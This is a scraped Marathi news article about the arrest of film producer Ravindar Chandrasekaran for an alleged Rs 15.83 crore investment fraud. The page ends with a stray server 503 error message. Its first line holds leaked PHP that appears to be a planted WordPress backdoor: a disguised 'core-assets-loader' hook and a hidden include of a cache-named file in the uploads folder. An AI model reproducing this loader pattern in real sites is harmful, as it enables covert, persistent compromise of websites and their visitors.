add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); व्यवसायाच्या नावाखाली चित्रपट निर्मात्याने घातला कोट्यावधींचा गंडा, पोलिसांनी केली अटक – SOCH INDIA
Menu

देश
व्यवसायाच्या नावाखाली चित्रपट निर्मात्याने घातला कोट्यावधींचा गंडा, पोलिसांनी केली अटक

nobanner

मुंबई- दक्षिणेतील चित्रपट निर्माता रविंदर चंद्रशेखरन यांच्याशी संबंधित मोठी बातमी समोर येत आहे. महापालिकेच्या घनकचऱ्याचे ऊर्जेत रूपांतर करण्याच्या व्यावसायिक प्रस्तावातून त्याने एका व्यावसायिकाची १५.८३ कोटी रुपयांची फसवणूक केल्याचे सांगितले जात आहे. सध्या या प्रकरणाचा तपास सुरू असून रविंदरला न्यायालयीन कोठडी सुनावण्यात आली आहे.

सेंट्रल क्राईम ब्रँच (CCB) च्या एन्ट्रस्टमेंट डॉक्युमेंट फ्रॉड (EDF) विंग-I ने गुरुवारी रविंदर चंद्रशेखरनला एका व्यावसायिकाची १५.८३ कोटी रुपयांची फसवणूक केल्याबद्दल अटक केली.

काय आहे संपूर्ण प्रकरण

पोलिसांनी सांगितले की, ‘मदव मीडिया प्रायव्हेट लिमिटेड’चे बालाजी कापा यांनी ग्रेटर चेन्नई पोलिस आयुक्तांकडे तक्रार दाखल केली. तक्रारीत म्हटले आहे की ऑक्टोबर २०२० मध्ये लिब्रा प्रॉडक्शन प्रायव्हेट लिमिटेडचे रविंदर चंद्रशेखरन (३९) यांनी माझ्याशी संपर्क साधला होता. महापालिकेच्या घनकचऱ्याचे ऊर्जेत रूपांतर करण्यासाठी त्यांनी नवीन व्यवसाय प्रस्ताव मांडला आणि आर्थिक मदत मागितली. त्यांनी १७ सप्टेंबर २०२० रोजी गुंतवणूक करार केला आणि बालाजी कापाने १५.८३ कोटी रुपये दिले. रक्कम मिळाल्यानंतर रविंदरने ऊर्जा व्यवसाय सुरू केला नाही किंवा रक्कम परत केली नाही.

बनावट कागदपत्रे वापरली

आता या तक्रारीच्या आधारे गुन्हा दाखल करण्यात आला असून ईडीएफने तपास सुरू केला आहे. तपासादरम्यान रविंदरने बालाजी कापाकडून गुंतवणूक मिळवण्यासाठी बनावट कागदपत्रांचा वापर केल्याचे उघड झाले. चित्रपट निर्मात्याला न्यायालयीन कोठडी सुनावण्यात आली.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.